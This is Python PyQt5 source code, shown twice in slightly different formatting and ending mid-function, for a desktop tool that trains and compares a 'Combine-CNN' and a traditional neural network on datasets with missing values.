dataModule.addWidget(self.dataLossSimulateSettingButton)
dataModule.addStretch(1)
dataModule.addWidget(self.dataShowButton)
dataModule.addStretch(1)
trainingModule = QVBoxLayout()
self.setModelParametersButton = QPushButton('Model Parameters')
self.setModelParametersButton.setFont(QFont('微软雅黑', 16))
self.trainingButton = QPushButton('Training')
self.trainingButton.setFont(QFont('微软雅黑', 16))
self.saveModelButton = QPushButton('Save Model')
self.saveModelButton.setFont(QFont('微软雅黑', 16))
self.loadModelButton = QPushButton('Load Model')
self.loadModelButton.setFont(QFont('微软雅黑', 16))
label = QLabel('Present Model:')
label.setFont(QFont('微软雅黑', 16))
self.presentModelName = QLabel('None')
self.presentModelName.setFont(QFont('微软雅黑', 16))
labelbox = QVBoxLayout()
labelbox.addWidget(label)
labelbox.addWidget(self.presentModelName)
trainingModule.addStretch(1)
trainingModule.addLayout(labelbox)
trainingModule.addStretch(1)
trainingModule.addWidget(self.setModelParametersButton)
trainingModule.addStretch(1)
trainingModule.addWidget(self.trainingButton)
trainingModule.addStretch(1)
trainingModule.addWidget(self.saveModelButton)
trainingModule.addStretch(1)
trainingModule.addWidget(self.loadModelButton)
trainingModule.addStretch(1)
resultShowModule = QVBoxLayout()
self.showResultButton = QPushButton('分类结果展示')
self.showResultButton.setFont(QFont('微软雅黑', 16))
self.judgeResultButton = QPushButton('分类结果评估')
self.judgeResultButton.setFont(QFont('微软雅黑', 16))
resultShowModule.addWidget(self.showResultButton)
resultShowModule.addWidget(self.judgeResultButton)
hboxTop = QHBoxLayout()
hboxTop.addStretch(1)
mcnnLabel = QLabel('Combine-CNN:')
mcnnLabel.setFont(QFont('微软雅黑', 24, QFont.Bold))
hboxTop.addWidget(mcnnLabel)
hboxTop.addStretch(1)
hboxTop.addLayout(dataModule)
hboxTop.addStretch(1)
hboxTop.addLayout(trainingModule)
hboxTop.addStretch(1)
hboxTop.addLayout(resultShowModule)
hboxTop.addStretch(1)
dataModuleT = QVBoxLayout()
self.dataFileChooseButtonT = QPushButton('选择数据')
self.dataFileChooseButtonT.setFont(QFont('微软雅黑', 16))
self.dataLossSimulateSettingButtonT = QPushButton('设置数据缺失参数')
self.dataLossSimulateSettingButtonT.setFont(QFont('微软雅黑', 16))
self.dataPreProcessButtonT = QPushButton('数据预处理')
self.dataPreProcessButtonT.setFont(QFont('微软雅黑', 16))
self.dataShowButtonT = QPushButton('展示数据')
self.dataShowButtonT.setFont(QFont('微软雅黑', 16))
label = QLabel('Present Data:')
label.setFont(QFont('微软雅黑', 16))
self.presentDataNameT = QLabel('None')
self.presentDataNameT.setFont(QFont('微软雅黑', 16))
labelbox = QVBoxLayout()
labelbox.addWidget(label)
labelbox.addWidget(self.presentDataNameT)
dataModuleT.addStretch(1)
dataModuleT.addLayout(labelbox)
dataModuleT.addStretch(1)
dataModuleT.addWidget(self.dataFileChooseButtonT)
dataModuleT.addStretch(1)
dataModuleT.addWidget(self.dataLossSimulateSettingButtonT)
dataModuleT.addStretch(1)
dataModuleT.addWidget(self.dataPreProcessButtonT)
dataModuleT.addStretch(1)
dataModuleT.addWidget(self.dataShowButtonT)
dataModuleT.addStretch(1)
trainingModuleT = QVBoxLayout()
self.setModelParametersButtonT = QPushButton('Model Parameters')
self.setModelParametersButtonT.setFont(QFont('微软雅黑', 16))
self.trainingButtonT = QPushButton('Training')
self.trainingButtonT.setFont(QFont('微软雅黑', 16))
self.saveModelButtonT = QPushButton('Save Model')
self.saveModelButtonT.setFont(QFont('微软雅黑', 16))
self.loadModelButtonT = QPushButton('Load Model')
self.loadModelButtonT.setFont(QFont('微软雅黑', 16))
label = QLabel('Present Model:')
label.setFont(QFont('微软雅黑', 16))
self.presentModelNameT = QLabel('None')
self.presentModelNameT.setFont(QFont('微软雅黑', 16))
labelbox = QVBoxLayout()
labelbox.addWidget(label)
labelbox.addWidget(self.presentModelNameT)
trainingModuleT.addStretch(1)
trainingModuleT.addLayout(labelbox)
trainingModuleT.addStretch(1)
trainingModuleT.addWidget(self.setModelParametersButtonT)
trainingModuleT.addStretch(1)
trainingModuleT.addWidget(self.trainingButtonT)
trainingModuleT.addStretch(1)
trainingModuleT.addWidget(self.saveModelButtonT)
trainingModuleT.addStretch(1)
trainingModuleT.addWidget(self.loadModelButtonT)
trainingModuleT.addStretch(1)
resultShowModuleT = QVBoxLayout()
self.showResultButtonT = QPushButton('分类结果展示')
self.showResultButtonT.setFont(QFont('微软雅黑', 16))
self.judgeResultButtonT = QPushButton('分类结果评估')
self.judgeResultButtonT.setFont(QFont('微软雅黑', 16))
resultShowModuleT.addWidget(self.showResultButtonT)
resultShowModuleT.addWidget(self.judgeResultButtonT)
hboxBottom = QHBoxLayout(self)
hboxBottom.addStretch(1)
traditionNNLabel = QLabel('Traditional NN:')
traditionNNLabel.setFont(QFont('微软雅黑', 24, QFont.Bold))
hboxBottom.addWidget(traditionNNLabel)
hboxBottom.addStretch(1)
hboxBottom.addLayout(dataModuleT)
hboxBottom.addStretch(1)
hboxBottom.addLayout(trainingModuleT)
hboxBottom.addStretch(1)
hboxBottom.addLayout(resultShowModuleT)
hboxBottom.addStretch(1)
splitterLine = QLabel(self)
splitterLine.setFont(QFont('Times', 1))
col = QColor(0, 0, 0)
splitterLine.setStyleSheet('QWidget { background-color: %s }' % col
.name())
splitterLine.resize(splitterLine.sizeHint())
vbox = QVBoxLayout()
vbox.addLayout(hboxTop)
vbox.addWidget(splitterLine)
vbox.addLayout(hboxBottom)
mainWidget = QWidget()
mainWidget.setLayout(vbox)
self.setCentralWidget(mainWidget)
self.setGeometry(350, 100, self.windowLength, self.windowHigh)
self.setWindowTitle('适用于有缺失值数据集的神经网络系统')
self.show()
def initConnect(self):
self.dataFileChooseButton.clicked.connect(self.chooseData)
self.dataFileChooseButtonT.clicked.connect(self.chooseData)
self.dataLossSimulateSettingButton.clicked.connect(self.
setLossParameter)
self.dataLossSimulateSettingButtonT.clicked.connect(self.
setLossParameter)
self.dataShowButton.clicked.connect(self.showData)
self.dataShowButtonT.clicked.connect(self.showData)
self.dataPreProcessButtonT.clicked.connect(self.preProcess)
self.setModelParametersButton.clicked.connect(self.setModelParameters)
self.setModelParametersButtonT.clicked.connect(self.setModelParameters)
self.trainingButton.clicked.connect(self.training)
self.trainingButtonT.clicked.connect(self.training)
self.saveModelButton.clicked.connect(self.saveModel)
self.saveModelButtonT.clicked.connect(self.saveModel)
self.loadModelButton.clicked.connect(self.loadModel)
self.loadModelButtonT.clicked.connect(self.loadModel)
self.showResultButton.clicked.connect(self.showResult)
self.showResultButtonT.clicked.connect(self.showResult)
self.judgeResultButton.clicked.connect(self.showJudge)
self.judgeResultButtonT.clicked.connect(self.showJudge)
def chooseData(self):
if self.sender() is self.dataFileChooseButton:
self.fname['New'], ok = QFileDialog.getOpenFileName(self,
'Open file', '..', 'Text files (*.txt)')
if ok:
self.loadData()
elif self.sender() is self.dataFileChooseButtonT:
self.fname['Tra'], ok = QFileDialog.getOpenFileName(self,
'Open file', '..', 'Text files (*.txt)')
if ok:
self.loadData()
return
def loadData(self):
if self.sender() is self.dataFileChooseButton:
try:
self.dataFor['New'] = myLoadData.loadData(self.fname['New'],
self.dataLossRate['New'], self.dataSetLossValue['New'])
except FileNotFoundError as e:
reply = QMessageBox.information(self, 'Message',
'Data file not exist', QMessageBox.Yes, QMessageBox.Yes)
return
except Exception:
reply = QMessageBox.information(self, 'Message',
'Data file format error', QMessageBox.Yes, QMessageBox.Yes)
return
dataname = self.fname['New'].split('/')[-1].split('.')[0]
self.presentDataName.setText(dataname)
self.presentDataName.resize(self.presentDataName.sizeHint())
elif self.sender() is self.dataFileChooseButtonT:
try:
self.dataFor['Tra'] = myLoadData.loadData(self.fname['Tra'],
self.dataLossRate['Tra'], self.dataSetLossValue['Tra'])
except FileNotFoundError as e:
reply = QMessageBox.information(self, 'Message',
'Data file not exist', QMessageBox.Yes, QMessageBox.Yes)
return
except Exception:
reply = QMessageBox.information(self, 'Message',
'Data file format error', QMessageBox.Yes, QMessageBox.Yes)
return
dataname = self.fname['Tra'].split('/')[-1].split('.')[0]
self.presentDataNameT.setText(dataname)
self.presentDataNameT.resize(self.presentDataNameT.sizeHint())
return
def setLossParameter(self):
if self.sender() is self.dataLossSimulateSettingButton:
self.setLPDialog = setLossParameterDialog.setLossParameterDialog(
'combine-CNN设置缺失参数', self, 'New')
elif self.sender() is self.dataLossSimulateSettingButtonT:
self.setLPDialog = setLossParameterDialog.setLossParameterDialog(
'traditional NN设置缺失参数', self, 'Tra')
return
def showData(self):
if self.sender() is self.dataShowButton:
self.showDataW = showDataWidget.ShowDataWidget('combine-CNN数据展示',
self, 'New')
elif self.sender() is self.dataShowButtonT:
self.showDataW = showDataWidget.ShowDataWidget('traditional NN数据展示'
, self, 'Tra')
return
def preProcess(self):
if self.dataFor['Tra'] is None:
reply = QMessageBox.information(self, '数据错误', '没有加载数据,无法预处理',
QMessageBox.Yes, QMessageBox.Yes)
else:
self.dataFor['Tra'].MeanPreProcess()
reply = QMessageBox.information(self, 'Message',
'PreProcess succeed!', QMessageBox.Yes, QMessageBox.Yes)
return
def setModelParameters(self):
if self.sender() is self.setModelParametersButton:
self.setModelParaW = (setModelParametersDialog.
setLossParameterDialog('combine-CNN模型参数设置', self, 'New'))
elif self.sender() is self.setModelParametersButtonT:
self.setModelParaW = (setModelParametersDialog.
setLossParameterDialog('traditional NN模型参数设置', self, 'Tra'))
def training(self):
if self.sender() is self.trainingButton:
if self.trainingW is not None:
self.trainingW.hide()
self.trainingW.show()
return
senderName = 'New'
elif self.sender() is self.trainingButtonT:
if self.trainingWT is not None:
self.trainingWT.hide()
self.trainingWT.show()
senderName = 'Tra'
if self.dataFor[senderName] is None:
reply = QMessageBox.information(self, '数据错误', '没有加载数据,无法训练',
QMessageBox.Yes, QMessageBox.Yes)
return
elif senderName == 'New':
if self.dataFor[senderName].DataTrainX.shape[1
] < self.combineNumConv:
reply = QMessageBox.information(self, '参数错误',
'卷积层组合(卷积核)大小大于数据集特征数量', QMessageBox.Yes, QMessageBox.Yes)
return
if combineNumCalculate.combineNumCal(self.dataFor[senderName].
DataTrainX.shape[1], self.combineNumConv
) < self.combineNumPooling:
reply = QMessageBox.information(self, '参数错误',
'池化层组合(池化核)大小大于卷积层输出特征向量维度', QMessageBox.Yes,
QMessageBox.Yes)
return
if self.trainingWT is not None:
reply = QMessageBox.information(self, '提示',
'traditional NN训练正在进行,请等待其结束', QMessageBox.Yes,
QMessageBox.Yes)
return
self.trainingW = TrainingWidget.trainningWidget('combine-CNN训练',
self, senderName)
self.traingWidgetOnFlag[senderName] = False
elif senderName == 'Tra':
if self.trainingW is not None:
reply = QMessageBox.information(self, '提示',
'combine-CNN训练正在进行,请等待其结束', QMessageBox.Yes,
QMessageBox.Yes)
return
self.trainingWT = TrainingWidget.trainningWidget('traditional NN训练'
, self, senderName)
self.traingWidgetOnFlag[senderName] = False
return
def saveModel(self):
if self.sender() is self.saveModelButton:
if self.mcbcnn is None:
reply = QMessageBox.information(self, '模型错误', '模型不存在',
QMessageBox.Yes, QMessageBox.Yes)
return
else:
fname, ok = QFileDialog.getSaveFileName(self, 'Save Model',
'..\\myCombineCNN.cbcnn.json',
'Combine-CNN json files (*.cbcnn.json)')
if ok:
succeed = self.mcbcnn.saveModel(fname)
if succeed:
reply = QMessageBox.information(self, '保存结果',
'模型保存成功', QMessageBox.Yes, QMessageBox.Yes)
else:
reply = QMessageBox.information(self, '保存结果',
'模型保存失败', QMessageBox.Yes, QMessageBox.Yes)
else:
reply = QMessageBox.information(self, '保存结果', '模型保存失败',
QMessageBox.Yes, QMessageBox.Yes)
elif self.sender() is self.saveModelButtonT:
if self.trann is None:
reply = QMessageBox.information(self, '模型错误', '模型不存在',
QMessageBox.Yes, QMessageBox.Yes)
return
else:
fname, ok = QFileDialog.getSaveFileName(self, 'Save Model',
'..\\traditionalNN.trann.json',
'Traditional NN json files (*.trann.json)')
if ok:
succeed = self.trann.saveModel(fname)
if succeed:
reply = QMessageBox.information(self, '保存结果',
'模型保存成功', QMessageBox.Yes, QMessageBox.Yes)
else:
reply = QMessageBox.information(self, '保存结果',
'模型保存失败', QMessageBox.Yes, QMessageBox.Yes)
else:
reply = QMessageBox.information(self, '保存结果', '模型保存失败',
QMessageBox.Yes, QMessageBox.Yes)
def loadModel(self):
if self.sender() is self.loadModelButton:
fname, ok = QFileDialog.getOpenFileName(self, 'Load Model',
'..', 'Combine-CNN json files (*.cbcnn.json)')
if ok:
if self.mcbcnn is None:
self.mcbcnn = myCombineCNN.myCombineCNN(None, self.
combineNumConv, self.convCoreNum, self.
combineNumPooling)
succeed = self.mcbcnn.setModel(fname)
if succeed:
modelName = fname.split('/')[-1].split('.')[0]
self.presentModelName.setText(modelName)
reply = QMessageBox.information(self, '设置结果', '模型设置成功',
QMessageBox.Yes, QMessageBox.Yes)
else:
reply = QMessageBox.information(self, '设置结果', '模型设置失败',
QMessageBox.Yes, QMessageBox.Yes)
else:
reply = QMessageBox.information(self, '设置结果', '模型设置失败',
QMessageBox.Yes, QMessageBox.Yes)
elif self.sender() is self.loadModelButtonT:
fname, ok = QFileDialog.getOpenFileName(self, 'Load Model',
'..', 'Traditional NN json files (*.trann.json)')
if ok:
if self.trann is None:
self.trann = traditionalNN.traditionalNN(None)
succeed = self.trann.setModel(fname)
if succeed:
modelName = fname.split('/')[-1].split('.')[0]
self.presentModelNameT.setText(modelName)
reply = QMessageBox.information(self, '设置结果', '模型设置成功',
QMessageBox.Yes, QMessageBox.Yes)
else:
reply = QMessageBox.information(self, '设置结果', '模型设置失败',
QMessageBox.Yes, QMessageBox.Yes)
else:
reply = QMessageBox.information(self, '设置结果', '模型设置失败',
QMessageBox.Yes, QMessageBox.Yes)
return
def showResult(self):
if self.sender() is self.showResultButton:
if self.traingWidgetOnFlag['New']:
reply = QMessageBox.information(self, '提示', '训练正在进行',
QMessageBox.Yes, QMessageBox.Yes)
return
self.showResultW = showResultWidget.ShowResultWidget(
'combine-CNN预测结果展示', self, 'New')
elif self.sender() is self.showResultButtonT:
if self.traingWidgetOnFlag['Tra']:
reply = QMessageBox.information(self, '提示', '训练正在进行',
QMessageBox.Yes, QMessageBox.Yes)
return
self.showResultW = showResultWidget.ShowResultWidget(
'traditional NN预测结果展示', self, 'Tra')
return
def showJudge(self):
if self.sender() is self.judgeResultButton:
if self.traingWidgetOnFlag['New']:
reply = QMessageBox.information(self, '提示', '训练正在进行',
QMessageBox.Yes, QMessageBox.Yes)
return
self.chooseJDWin = (chooseJudgeDataSetWidget.
chooseJudgeDataSetWidget(
'Choose Judgement-based-on Data Set', self, 'New'))
elif self.sender() is self.judgeResultButtonT:
if self.traingWidgetOnFlag['Tra']:
reply = QMessageBox.information(self, '提示', '训练正在进行',
QMessageBox.Yes, QMessageBox.Yes)
return
self.chooseJDWin = (chooseJudgeDataSetWidget.
chooseJudgeDataSetWidget(
'Choose Judgement-based-on Data Set', self, 'Tra'))
if __name__ == '__main__':
app = QApplication(sys.argv)
myMainWindow = MyMainWindow()
sys.exit(app.exec_())
| import sys
from PyQt5.QtWidgets import (QMainWindow, QWidget, QHBoxLayout, QVBoxLayout, QFrame,
QSplitter, QStyleFactory, QApplication, QPushButton, QTextEdit, QLabel, QFileDialog, QMessageBox)
from PyQt5.QtCore import Qt
from PyQt5.QtGui import QFont, QColor
import myLoadData
from UIPack import setLossParameterDialog, showDataWidget, setModelParametersDialog, TrainingWidget, showResultWidget,\
showJudgeWidgets, chooseJudgeDataSetWidget
from MyCombCNNPack import combineNumCalculate, myCombineCNN, traditionalNN, Judgement
class MyMainWindow(QMainWindow):
def __init__(self):
super().__init__()
self.windowLength = 1250
self.windowHigh = 900
self.fname = dict()
self.fname['New'] = None
self.fname['Tra'] = None
self.dataLossRate = dict()
self.dataSetLossValue = dict()
self.dataFor = dict()
self.dataFor['New'] = None
self.dataLossRate['New'] = 0.
self.dataSetLossValue['New'] = 0.
self.dataFor['Tra'] = None
self.dataLossRate['Tra'] = 0.
self.dataSetLossValue['Tra'] = 0.
self.traingWidgetOnFlag = dict()
self.traingWidgetOnFlag['New'] = False
self.traingWidgetOnFlag['Tra'] = False
self.combineNumConv = 2
self.convCoreNum = 5
self.combineNumPooling = 4
self.fullConnectOutInRate = 0.5
self.mcbcnn = None
self.trann = None
self.trainingW = None
self.trainingWT = None
self.initUI()
self.initConnect()
def initUI(self):
self.statusBar().showMessage('Ready')
####### data module #######
dataModule = QVBoxLayout()
self.dataFileChooseButton = QPushButton('选择数据')
self.dataFileChooseButton.setFont(QFont('微软雅黑', 16))
self.dataLossSimulateSettingButton = QPushButton('设置数据缺失参数')
self.dataLossSimulateSettingButton.setFont(QFont('微软雅黑', 16))
self.dataShowButton = QPushButton('展示数据')
self.dataShowButton.setFont(QFont('微软雅黑', 16))
label = QLabel('Present Data:')
label.setFont(QFont('微软雅黑', 16))
self.presentDataName = QLabel('None')
self.presentDataName.setFont(QFont('微软雅黑', 16))
labelbox = QVBoxLayout()
labelbox.addWidget(label)
labelbox.addWidget(self.presentDataName)
dataModule.addStretch(1)
dataModule.addLayout(labelbox)
dataModule.addStretch(1)
dataModule.addWidget(self.dataFileChooseButton)
dataModule.addStretch(1)
dataModule.addWidget(self.dataLossSimulateSettingButton)
dataModule.addStretch(1)
dataModule.addWidget(self.dataShowButton)
dataModule.addStretch(1)
###### training module ########
trainingModule = QVBoxLayout()
self.setModelParametersButton = QPushButton('Model Parameters')
self.setModelParametersButton.setFont(QFont('微软雅黑', 16))
# self.setTrainingParametersButton = QPushButton('Trainning Parameters')
# self.setTrainingParametersButton.setFont(QFont('微软雅黑', 16))
self.trainingButton = QPushButton('Training')
self.trainingButton.setFont(QFont('微软雅黑', 16))
self.saveModelButton = QPushButton('Save Model')
self.saveModelButton.setFont(QFont('微软雅黑', 16))
self.loadModelButton = QPushButton('Load Model')
self.loadModelButton.setFont(QFont('微软雅黑', 16))
label = QLabel('Present Model:')
label.setFont(QFont('微软雅黑', 16))
self.presentModelName = QLabel('None')
self.presentModelName.setFont(QFont('微软雅黑', 16))
labelbox = QVBoxLayout()
labelbox.addWidget(label)
labelbox.addWidget(self.presentModelName)
trainingModule.addStretch(1)
trainingModule.addLayout(labelbox)
trainingModule.addStretch(1)
trainingModule.addWidget(self.setModelParametersButton)
trainingModule.addStretch(1)
trainingModule.addWidget(self.trainingButton)
trainingModule.addStretch(1)
trainingModule.addWidget(self.saveModelButton)
trainingModule.addStretch(1)
trainingModule.addWidget(self.loadModelButton)
trainingModule.addStretch(1)
############## new cnn result show ######
resultShowModule = QVBoxLayout()
self.showResultButton = QPushButton('分类结果展示')
self.showResultButton.setFont(QFont('微软雅黑', 16))
self.judgeResultButton = QPushButton('分类结果评估')
self.judgeResultButton.setFont(QFont('微软雅黑', 16))
resultShowModule.addWidget(self.showResultButton)
resultShowModule.addWidget(self.judgeResultButton)
################# new algorithm ui ##########
hboxTop = QHBoxLayout()
hboxTop.addStretch(1)
mcnnLabel = QLabel('Combine-CNN:')
mcnnLabel.setFont(QFont('微软雅黑', 24, QFont.Bold))
hboxTop.addWidget(mcnnLabel)
hboxTop.addStretch(1)
hboxTop.addLayout(dataModule)
hboxTop.addStretch(1)
hboxTop.addLayout(trainingModule)
hboxTop.addStretch(1)
hboxTop.addLayout(resultShowModule)
hboxTop.addStretch(1)
#########traditional data module##########
dataModuleT = QVBoxLayout()
self.dataFileChooseButtonT = QPushButton('选择数据')
self.dataFileChooseButtonT.setFont(QFont('微软雅黑', 16))
self.dataLossSimulateSettingButtonT = QPushButton('设置数据缺失参数')
self.dataLossSimulateSettingButtonT.setFont(QFont('微软雅黑', 16))
self.dataPreProcessButtonT = QPushButton('数据预处理')
self.dataPreProcessButtonT.setFont(QFont('微软雅黑', 16))
self.dataShowButtonT = QPushButton('展示数据')
self.dataShowButtonT.setFont(QFont('微软雅黑', 16))
label = QLabel('Present Data:')
label.setFont(QFont('微软雅黑', 16))
self.presentDataNameT = QLabel('None')
self.presentDataNameT.setFont(QFont('微软雅黑', 16))
labelbox = QVBoxLayout()
labelbox.addWidget(label)
labelbox.addWidget(self.presentDataNameT)
dataModuleT.addStretch(1)
dataModuleT.addLayout(labelbox)
dataModuleT.addStretch(1)
dataModuleT.addWidget(self.dataFileChooseButtonT)
dataModuleT.addStretch(1)
dataModuleT.addWidget(self.dataLossSimulateSettingButtonT)
dataModuleT.addStretch(1)
dataModuleT.addWidget(self.dataPreProcessButtonT)
dataModuleT.addStretch(1)
dataModuleT.addWidget(self.dataShowButtonT)
dataModuleT.addStretch(1)
###### training module ########
trainingModuleT = QVBoxLayout()
self.setModelParametersButtonT = QPushButton('Model Parameters')
self.setModelParametersButtonT.setFont(QFont('微软雅黑', 16))
self.trainingButtonT = QPushButton('Training')
self.trainingButtonT.setFont(QFont('微软雅黑', 16))
self.saveModelButtonT = QPushButton('Save Model')
self.saveModelButtonT.setFont(QFont('微软雅黑', 16))
self.loadModelButtonT = QPushButton('Load Model')
self.loadModelButtonT.setFont(QFont('微软雅黑', 16))
label = QLabel('Present Model:')
label.setFont(QFont('微软雅黑', 16))
self.presentModelNameT = QLabel('None')
self.presentModelNameT.setFont(QFont('微软雅黑', 16))
labelbox = QVBoxLayout()
labelbox.addWidget(label)
labelbox.addWidget(self.presentModelNameT)
trainingModuleT.addStretch(1)
trainingModuleT.addLayout(labelbox)
trainingModuleT.addStretch(1)
trainingModuleT.addWidget(self.setModelParametersButtonT)
trainingModuleT.addStretch(1)
trainingModuleT.addWidget(self.trainingButtonT)
trainingModuleT.addStretch(1)
trainingModuleT.addWidget(self.saveModelButtonT)
trainingModuleT.addStretch(1)
trainingModuleT.addWidget(self.loadModelButtonT)
trainingModuleT.addStretch(1)
############## traditional nn result show ######
resultShowModuleT = QVBoxLayout()
self.showResultButtonT = QPushButton('分类结果展示')
self.showResultButtonT.setFont(QFont('微软雅黑', 16))
self.judgeResultButtonT = QPushButton('分类结果评估')
self.judgeResultButtonT.setFont(QFont('微软雅黑', 16))
resultShowModuleT.addWidget(self.showResultButtonT)
resultShowModuleT.addWidget(self.judgeResultButtonT)
####### traditional algorithm #########
hboxBottom = QHBoxLayout(self)
hboxBottom.addStretch(1)
traditionNNLabel = QLabel('Traditional NN:')
traditionNNLabel.setFont(QFont('微软雅黑', 24, QFont.Bold))
hboxBottom.addWidget(traditionNNLabel)
hboxBottom.addStretch(1)
hboxBottom.addLayout(dataModuleT)
hboxBottom.addStretch(1)
hboxBottom.addLayout(trainingModuleT)
hboxBottom.addStretch(1)
hboxBottom.addLayout(resultShowModuleT)
hboxBottom.addStretch(1)
########## whole frame layout ########
splitterLine = QLabel(self)
splitterLine.setFont(QFont('Times', 1))
col = QColor(0, 0, 0)
splitterLine.setStyleSheet("QWidget { background-color: %s }" % col.name())
splitterLine.resize(splitterLine.sizeHint())
vbox = QVBoxLayout()
vbox.addLayout(hboxTop)
# vbox.addWidget(QLabel(str('_'*int(self.width()/3))))
vbox.addWidget(splitterLine)
vbox.addLayout(hboxBottom)
mainWidget = QWidget()
mainWidget.setLayout(vbox)
self.setCentralWidget(mainWidget)
self.setGeometry(350, 100, self.windowLength, self.windowHigh)
self.setWindowTitle('适用于有缺失值数据集的神经网络系统')
self.show()
def initConnect(self):
self.dataFileChooseButton.clicked.connect(self.chooseData)
self.dataFileChooseButtonT.clicked.connect(self.chooseData)
self.dataLossSimulateSettingButton.clicked.connect(self.setLossParameter)
self.dataLossSimulateSettingButtonT.clicked.connect(self.setLossParameter)
self.dataShowButton.clicked.connect(self.showData)
self.dataShowButtonT.clicked.connect(self.showData)
self.dataPreProcessButtonT.clicked.connect(self.preProcess)
self.setModelParametersButton.clicked.connect(self.setModelParameters)
self.setModelParametersButtonT.clicked.connect(self.setModelParameters)
self.trainingButton.clicked.connect(self.training)
self.trainingButtonT.clicked.connect(self.training)
self.saveModelButton.clicked.connect(self.saveModel)
self.saveModelButtonT.clicked.connect(self.saveModel)
self.loadModelButton.clicked.connect(self.loadModel)
self.loadModelButtonT.clicked.connect(self.loadModel)
self.showResultButton.clicked.connect(self.showResult)
self.showResultButtonT.clicked.connect(self.showResult)
self.judgeResultButton.clicked.connect(self.showJudge)
self.judgeResultButtonT.clicked.connect(self.showJudge)
############ data load module #####################
def chooseData(self):
if self.sender() is self.dataFileChooseButton:
self.fname['New'], ok = QFileDialog.getOpenFileName(self, 'Open file', '..', 'Text files (*.txt)')
if ok:
# dataname = self.fname['New'].split('/')[-1].split('.')[0]
# # print(dataname)
# self.presentDataName.setText(dataname)
# self.presentDataName.resize(self.presentDataName.sizeHint())
self.loadData()
elif self.sender() is self.dataFileChooseButtonT:
self.fname['Tra'], ok = QFileDialog.getOpenFileName(self, 'Open file', '..', 'Text files (*.txt)')
if ok:
# dataname = self.fname['Tra'].split('/')[-1].split('.')[0]
# # print(dataname)
# self.presentDataNameT.setText(dataname)
# self.presentDataNameT.resize(self.presentDataNameT.sizeHint())
self.loadData()
return
def loadData(self):
if self.sender() is self.dataFileChooseButton:
try:
self.dataFor['New'] = myLoadData.loadData(self.fname['New'], self.dataLossRate['New'], self.dataSetLossValue['New'])
# print(self.dataFor['New'].DataTrainX, '\n', self.dataFor['New'].DataTrainY)
except FileNotFoundError as e:
reply = QMessageBox.information(self, 'Message', "Data file not exist",
QMessageBox.Yes, QMessageBox.Yes)
return
except Exception:
reply = QMessageBox.information(self, 'Message', "Data file format error",
QMessageBox.Yes, QMessageBox.Yes)
return
dataname = self.fname['New'].split('/')[-1].split('.')[0]
# print(dataname)
self.presentDataName.setText(dataname)
self.presentDataName.resize(self.presentDataName.sizeHint())
elif self.sender() is self.dataFileChooseButtonT:
try:
self.dataFor['Tra'] = myLoadData.loadData(self.fname['Tra'], self.dataLossRate['Tra'], self.dataSetLossValue['Tra'])
# print(self.dataFor['Tra'].DataTrainX, '\n', self.dataFor['Tra'].DataTrainY)
except FileNotFoundError as e:
reply = QMessageBox.information(self, 'Message', "Data file not exist",
QMessageBox.Yes, QMessageBox.Yes)
return
except Exception:
reply = QMessageBox.information(self, 'Message', "Data file format error",
QMessageBox.Yes, QMessageBox.Yes)
return
dataname = self.fname['Tra'].split('/')[-1].split('.')[0]
# print(dataname)
self.presentDataNameT.setText(dataname)
self.presentDataNameT.resize(self.presentDataNameT.sizeHint())
return
def setLossParameter(self):
if self.sender() is self.dataLossSimulateSettingButton:
self.setLPDialog = setLossParameterDialog.setLossParameterDialog('combine-CNN设置缺失参数', self, 'New')
elif self.sender() is self.dataLossSimulateSettingButtonT:
self.setLPDialog = setLossParameterDialog.setLossParameterDialog('traditional NN设置缺失参数', self, 'Tra')
# print(self.dataLossRate)
# print(self.dataSetLossValue)
return
def showData(self):
if self.sender() is self.dataShowButton:
# print(1)
self.showDataW = showDataWidget.ShowDataWidget('combine-CNN数据展示', self, 'New')
elif self.sender() is self.dataShowButtonT:
# print(1)
self.showDataW = showDataWidget.ShowDataWidget('traditional NN数据展示', self, 'Tra')
return
def preProcess(self):
if self.dataFor['Tra'] is None:
reply = QMessageBox.information(self, '数据错误', '没有加载数据,无法预处理',
QMessageBox.Yes, QMessageBox.Yes)
else:
self.dataFor['Tra'].MeanPreProcess()
reply = QMessageBox.information(self, 'Message', 'PreProcess succeed!',
QMessageBox.Yes, QMessageBox.Yes)
return
############## training module #################
def setModelParameters(self):
if self.sender() is self.setModelParametersButton:
# print(1)
self.setModelParaW = setModelParametersDialog.setLossParameterDialog('combine-CNN模型参数设置', self, 'New')
elif self.sender() is self.setModelParametersButtonT:
self.setModelParaW = setModelParametersDialog.setLossParameterDialog('traditional NN模型参数设置', self, 'Tra')
def training(self):
if self.sender() is self.trainingButton:
if self.trainingW is not None:
self.trainingW.hide()
# print(self.trainingW)
self.trainingW.show()
return
senderName = 'New'
elif self.sender() is self.trainingButtonT:
if self.trainingWT is not None:
self.trainingWT.hide()
self.trainingWT.show()
senderName = 'Tra'
if self.dataFor[senderName] is None:
reply = QMessageBox.information(self, '数据错误', '没有加载数据,无法训练',
QMessageBox.Yes, QMessageBox.Yes)
return
elif senderName == 'New':
if self.dataFor[senderName].DataTrainX.shape[1] < self.combineNumConv:
reply = QMessageBox.information(self, '参数错误', '卷积层组合(卷积核)大小大于数据集特征数量',
QMessageBox.Yes, QMessageBox.Yes)
return
if combineNumCalculate.combineNumCal(self.dataFor[senderName].DataTrainX.shape[1], self.combineNumConv)\
< self.combineNumPooling:
reply = QMessageBox.information(self, '参数错误', '池化层组合(池化核)大小大于卷积层输出特征向量维度',
QMessageBox.Yes, QMessageBox.Yes)
return
# print(self.trainingW)
if self.trainingWT is not None:
reply = QMessageBox.information(self, '提示', 'traditional NN训练正在进行,请等待其结束',
QMessageBox.Yes, QMessageBox.Yes)
return
self.trainingW = TrainingWidget.trainningWidget('combine-CNN训练', self, senderName)
self.traingWidgetOnFlag[senderName] = False
elif senderName == 'Tra':
if self.trainingW is not None:
reply = QMessageBox.information(self, '提示', 'combine-CNN训练正在进行,请等待其结束',
QMessageBox.Yes, QMessageBox.Yes)
return
self.trainingWT = TrainingWidget.trainningWidget('traditional NN训练', self, senderName)
self.traingWidgetOnFlag[senderName] = False
return
def saveModel(self):
if self.sender() is self.saveModelButton:
if self.mcbcnn is None:
reply = QMessageBox.information(self, '模型错误', '模型不存在',
QMessageBox.Yes, QMessageBox.Yes)
return
else:
fname, ok = QFileDialog.getSaveFileName(self, 'Save Model', '..\\myCombineCNN.cbcnn.json',
'Combine-CNN json files (*.cbcnn.json)')
if ok:
succeed = self.mcbcnn.saveModel(fname)
if succeed:
reply = QMessageBox.information(self, '保存结果', '模型保存成功',
QMessageBox.Yes, QMessageBox.Yes)
else:
reply = QMessageBox.information(self, '保存结果', '模型保存失败',
